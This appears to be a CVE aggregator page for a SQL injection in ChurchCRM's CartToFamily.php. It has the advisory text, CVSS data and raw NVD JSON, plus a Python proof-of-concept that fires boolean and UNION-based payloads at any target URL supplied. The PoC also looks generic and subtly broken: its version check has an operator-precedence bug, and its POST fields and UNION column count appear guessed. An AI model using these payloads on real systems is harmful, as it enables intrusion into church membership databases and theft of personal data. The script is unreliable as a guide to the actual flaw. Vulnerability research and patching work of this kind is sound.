CVE-2025-67877

Description

ChurchCRM is an open-source church management system. Versions prior to 6.5.3 have a SQL injection vulnerability in the `src/CartToFamily.php` file, specifically in how the `PersonAddress` POST parameter is handled. Unlike other parameters in the same file which are correctly cast to integers using the `InputUtils` class, the `PersonAddress` parameter is missing the type definition. This allows an attacker to inject arbitrary SQL commands directly into the query. Version 6.5.3 fixes the issue.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE

ChurchCRM < 6.5.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-67877 SQL Injection PoC for ChurchCRM
# Target: ChurchCRM < 6.5.3
# Vulnerability: SQL Injection in src/CartToFamily.php via PersonAddress parameter

def test_sql_injection(target_url, payload):
    """
    Test for SQL injection vulnerability
    """
    # Prepare the POST data
    data = {
        'PersonAddress': payload,
        'CartId': '1',
        'Action': 'submit'
    }
    
    try:
        response = requests.post(
            f"{target_url}/src/CartToFamily.php",
            data=data,
            timeout=10,
            verify=False
        )
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def basic_injection_test(target_url):
    """
    Basic test to confirm vulnerability exists
    """
    # True condition - should return results
    true_payload = "1' OR '1'='1"
    # False condition - should return no results or error
    false_payload = "1' AND '1'='2"
    
    print("[*] Testing basic SQL injection...")
    print(f"[*] True condition payload: {true_payload}")
    resp_true = test_sql_injection(target_url, true_payload)
    
    print(f"[*] False condition payload: {false_payload}")
    resp_false = test_sql_injection(target_url, false_payload)
    
    if resp_true and resp_false:
        if len(resp_true.text) != len(resp_false.text):
            print("[+] Vulnerability confirmed! Different responses received.")
            return True
    return False

def extract_db_version(target_url):
    """
    Extract database version using UNION-based injection
    """
    # Payload to extract MySQL version
    payload = "1' UNION SELECT NULL,NULL,@@version,NULL,NULL-- -"
    
    print("[*] Extracting database version...")
    resp = test_sql_injection(target_url, payload)
    
    if resp and '5.' in resp.text or '8.' in resp.text:
        print("[+] Database version extracted successfully")
        return True
    return False

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-67877_poc.py <target_url>")
        print("Example: python cve-2025-67877_poc.py http://churchcrm.example.com")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    
    print(f"[*] Target: {target_url}")
    print(f"[*] CVE: CVE-2025-67877")
    print(f"[*] Vulnerability: SQL Injection in ChurchCRM CartToFamily.php")
    print("-" * 60)
    
    if basic_injection_test(target_url):
        print("[+] SQL Injection vulnerability confirmed!")
        extract_db_version(target_url)
    else:
        print("[-] Vulnerability not detected or target not vulnerable")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67877
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67877
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67877/
[4] VulDB https://vuldb.com/cve/CVE-2025-67877
[5] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-h3vq-9gr6-h9r4
[6] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-h3vq-9gr6-h9r4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67877", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:00.610", "lastModified": "2025-12-18T18:30:28.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Versions prior to 6.5.3 have a SQL injection vulnerability in the `src/CartToFamily.php` file, specifically in how the `PersonAddress` POST parameter is handled. Unlike other parameters in the same file which are correctly cast to integers using the `InputUtils` class, the `PersonAddress` parameter is missing the type definition. This allows an attacker to inject arbitrary SQL commands directly into the query. Version 6.5.3 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.3", "matchCriteriaId": "5B1435CA-1370-4154-85E0-6AF1846DEEBD"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-h3vq-9gr6-h9r4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-h3vq-9gr6-h9r4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}